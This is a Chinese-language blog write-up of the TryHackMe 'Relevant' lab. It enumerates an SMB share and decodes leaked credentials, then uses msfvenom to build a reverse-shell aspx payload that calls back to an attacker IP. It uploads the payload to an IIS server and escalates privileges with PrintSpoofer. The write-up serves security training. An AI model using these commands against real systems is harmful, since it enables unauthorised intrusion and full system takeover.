TryHackMe | Relevant Writeup

TryHackMe | Relevant Writeup

信息收集

image-20230719164554036

有2个 Web 服务(80/tcp、49663/tcp)以及网络共享(445/tcp和 rdp的3389端口。

image-20230719164748445

有个nt4wrksv,连接看看

image-20230719164841464

有一个密码文件,打开是base64

image-20230719164915366

解码

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
 

想着拿密码先连接一波,直接就开始连接3389,好家伙,一个都不行

那就先看看80和49663端口吧,拿gobuster扫一下

 

发现了有个/nt4wksv目录,大胆推测这个就是我们共享文件的目录

image-20230719180104942

果然访问到了

所以我们的方向就很明确了,上传shell到nt4wksv,然后利用web访问激活反弹shell

首先生成一个反向shell,而且我们知道49663端口是IIS web服务,所以我们可以用aspx文件

.aspx是ASP.NET 页面的扩展名。它无非是在静态HTML网页里面嵌入了动态的指令(这些动态指令是由各种脚本语言编写的,是由IIS服务器上的脚本引擎来执行的)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.17.58.33 lport=1234 -f aspx -o shell.aspx

image-20230719184403598

然后再在共享文件处上传

image-20230719184534965

再我们网页端访问前先打开监听,然后再访问

image-20230719185112546

然后访问

http://10.10.94.191:49663/nt4wrksv/shell.aspx
 

然后就得到了shell,然后执行shell后就可先找user.txt

image-20230719185330341

提权

root.txt一定是需要最高权限的,所以我们需要提权

先看看令牌,检查我们的权限会发现我们被授予 SeImpersonatePrivilege

image-20230719194040901

搜索了一下,确实存在可以利用的漏洞,利用PrintSpoofer来提权

image-20230719194215589

下载工具

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

再利用文件共享上传到目标服务器上

image-20230719193910473

image-20230719194404335

再执行以下命令执行

PrintSpoofer64.exe -i -c cmd 
 

image-20230719194609922



posted @ 2023-07-19 19:52  L0VEhzzz  阅读(22)  评论(0编辑  收藏  举报